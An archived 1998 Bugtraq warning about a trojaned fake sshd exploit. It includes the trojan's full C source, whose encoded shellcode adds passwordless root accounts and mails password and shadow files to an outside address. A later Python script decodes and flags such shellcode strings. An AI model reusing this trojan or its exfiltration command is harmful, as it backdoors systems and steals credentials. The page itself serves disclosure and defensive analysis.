The OpenNET Project / Index page

Administrivia

Date: Sun, 15 Nov 1998 02:31:58 -0600
From: Chris Tobkin <tobkin@JAWS.UMN.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Administrivia

Speaking of trojans/lame scripts, there is a 'root exploit for Linux 2.0.* and
possibly 2.1.* SSHD 1.5-1.2.23' going around on some of the efnet channels..
It is actually a spiffed-up C script that does:

 echo b4b0::0:0::/:>>/etc/passwd;echo babo::10:10::/: >> /etc/passwd ; (cat /etc/passwd /etc/shadow ;/sbin/ifconfig)|mail kitandjp@hotmail.com
 /bin/sh

If one were to just print out the shellcode this would be immediately obvious.
(i.e. printf("<insert shellcode here>");  pipe it through strings to get rid of
the control characters..)

The filenames it is being passed around under are "sshdexp.c" and
"sshdwarez.c", which was already referenced on bugtraq...  other people can rip
this one to shreds: the fetch(), which is cute..  and the system("/bin/echo")
instead of printf("").  This is, however, a good way to get rid of scriptkiddies
that don't know how to write code but want all the benefits of everyone else's
intelligence..

Caveat emptor, again.

// chris
tobkin@umn.edu

*************************************************************************
Chris Tobkin                                               tobkin@umn.edu
Java and Web Services - Academic and Distributed Computing Services - UMN
 -----------------------------------------------------------------------
  "Thanks to the printing press, the deviant smart people were able to
    distribute their genius without having to pass it on genetically.
         Evolution was short-circuited.  We gained knowledge and
        technology without gaining intelligence." - Scott Adams
*************************************************************************

-- sshdtrojan.c --

/************************************************************************/
/* root exploit for Linux 2.0.* and possible 2.1.* SSHD 1.5-1.2.23      */
/* On some weird systems this causes a segfault                         */
/* If it doesnt work change the offset (usually between 0 and 5000)     */
/*                                     (try increments of 2.......)     */
/* TO RUN:                                                              */
/* (./sshdwarez ; cat) | nc victim 22                                   */
/*                                                                      */
/*              forever yours: st4n@zdnetmail.com                       */
/************************************************************************/

#include <string.h>
#include <unistd.h>
#include <stdlib.h>

#define OFFSET  146
#define NOP     0x90

char shellcode[] =
"\xbc\x84\x04\x08\x65\x63\x68\x6f\x20\x62\x34\x62\x30\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x3e\x3e\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77"
"\x64\x3b\x65\x63\x68\x6f\x20\x62\x61\x62\x6f\x3a\x3a\x31\x30\x3a\x31"
"\x30\x3a\x3a\x2f\x3a\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73"
"\x73\x77\x64\x20\x3b\x20\x28\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77"
"\x20\x3b\x2f\x73\x62\x69\x6e\x2f\x69\x66\x63\x6f\x6e\x66\x69\x67\x29"
"\x7c\x6d\x61\x69\x6c\x20\x6b\x69\x74\x61\x6e\x64\x6a\x70\x40\x68\x6f"
"\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x00\xeb\x1f\x5e\x89\x76\x08\x31"
"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int fetch(int *w){      /* push and return something from the stack */
        char stack[4096];
        int (*push)();
        memcpy((int*)&push,w,sizeof(int));
        memcpy(stack,(char*)w+4,OFFSET-5);
        push(stack);
        return *w;
}

int i;
char *p;
main(int argc,char**argv)
{
        char s[1024];
        char ssh[] = "\x8c\xfd\xff\xbf\x48\x9b"; /* starts ssh session */
        strcpy(argv[0],"vi          ");

        if (getuid())
        {
                system("/bin/echo this program uses priveledged ports. "
                       "run as root.");
                return -1;
        }
        write(1,ssh,sizeof(ssh));
        for (i=0;i<500;i++)
                s[i]=NOP;
        p=&s[i];
        memcpy(p,&shellcode[OFFSET],sizeof(shellcode)-OFFSET);
        /* most [linux] systems keep libc functions in the same place */
        i=(int)system;memcpy(&shellcode,&i,sizeof(int));
        write(1,s,500+(sizeof(shellcode)-OFFSET));
        fetch((int*)&shellcode);
        usleep(1000000);
        return 0;
}
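Tobkin's check above (print the shellcode and pipe it through strings) turns a claimed exploit into something readable before anyone compiles it. The script below is an added example written for this page, not code from the post or from the trojan's author: it pulls a `char NAME[] = "..."` array out of C source, decodes the escapes the way a C compiler does, lists the printable runs the way strings(1) would, and flags the ones that mention password files, output redirection or a shell. It also reads the first four bytes as a little-endian pointer, because in the posted sshdtrojan.c main() overwrites that slot with the address of system() and fetch() then calls through it, so the "exploit" runs the embedded command line on the machine of whoever executes it. The sample C fragment and the indicator list are constructed for this example and are not taken from the page.

```python
import re
import string

# Constructed sample input: a trimmed C fragment in the style of the posted
# sshdtrojan.c. It is NOT the file from the page; the command text is made
# up, only the "\xbc\x84\x04\x08" pointer slot and the layout mirror it.
SAMPLE_C_SOURCE = r'''
char shellcode[] =
"\xbc\x84\x04\x08\x65\x63\x68\x6f\x20\x78\x3a\x3a\x30\x3a\x30\x3a\x3a"
"\x2f\x3a\x3e\x3e\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x00\xeb"
"\x1f\x5e\x89\x76\x08\x31\xc0\xcd\x80/bin/sh";
'''

# Matches `char NAME[] = "..." "..." ;` with any number of adjacent literals.
ARRAY_RE = re.compile(
    r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);', re.S)
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)

SIMPLE_ESCAPES = {'n': 10, 't': 9, 'r': 13, 'a': 7, 'b': 8, 'f': 12,
                  'v': 11, '\\': 92, '"': 34, "'": 39, '?': 63}


def decode_c_literal(body):
    """Decode the body of one C string literal into bytes (C escape rules)."""
    out = bytearray()
    i = 0
    while i < len(body):
        ch = body[i]
        if ch != '\\':
            out.extend(ch.encode('latin-1'))
            i += 1
            continue
        i += 1
        esc = body[i]
        if esc == 'x':
            # C consumes every following hex digit, not just two.
            j = i + 1
            while j < len(body) and body[j] in string.hexdigits:
                j += 1
            value = int(body[i + 1:j], 16)
            if value > 0xff:
                raise ValueError("hex escape out of range: \\x" + body[i + 1:j])
            out.append(value)
            i = j
        elif esc in '01234567':
            # Octal escape: at most three digits.
            j = i
            while j < len(body) and j < i + 3 and body[j] in '01234567':
                j += 1
            out.append(int(body[i:j], 8) & 0xff)
            i = j
        elif esc in SIMPLE_ESCAPES:
            out.append(SIMPLE_ESCAPES[esc])
            i += 1
        else:
            raise ValueError("unknown escape \\" + esc)
    return bytes(out)


def extract_char_array(source):
    """Return (name, bytes) for the first `char NAME[] = "..."` in C source."""
    m = ARRAY_RE.search(source)
    if not m:
        raise ValueError('no char NAME[] = "..." definition found')
    name, literals = m.group(1), m.group(2)
    data = b"".join(decode_c_literal(lit) for lit in LITERAL_RE.findall(literals))
    return name, data


def printable_strings(data, minlen=4):
    """Runs of printable ASCII of at least minlen bytes, like strings(1)."""
    found, run = [], bytearray()
    for b in data:
        if 0x20 <= b <= 0x7e:
            run.append(b)
        else:
            if len(run) >= minlen:
                found.append(run.decode('ascii'))
            run = bytearray()
    if len(run) >= minlen:
        found.append(run.decode('ascii'))
    return found


# Indicator list chosen for this example; tune it to what you are reviewing.
INDICATORS = ("/etc/passwd", "/etc/shadow", ">>", "|", "mail", "@", "/bin/sh")


def flag_strings(strs):
    """Map each string that contains an indicator to the indicators it hit."""
    return {s: [ind for ind in INDICATORS if ind in s]
            for s in strs if any(ind in s for ind in INDICATORS)}


def analyze(source):
    name, data = extract_char_array(source)
    strs = printable_strings(data)
    return {
        "name": name,
        "size": len(data),
        # First dword as a little-endian pointer: the slot that the posted
        # trojan's main() overwrites with the address of system().
        "pointer_slot": int.from_bytes(data[:4], "little"),
        "strings": strs,
        "flagged": flag_strings(strs),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_C_SOURCE)
    print(f'{report["name"]}: {report["size"]} bytes, '
          f'pointer slot 0x{report["pointer_slot"]:08x}')
    for s in report["strings"]:
        print(("  !! " if s in report["flagged"] else "     ") + repr(s))
```

Run against a real source file by reading it into `analyze()` instead of the constructed sample; anything that prints with `!!` is a command line or path that a "shellcode" has no business carrying, and a pointer slot at the front of the buffer is the hint to look at what main() does with those bytes before calling it.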

Created 1996-2003 by Maxim Chirkov  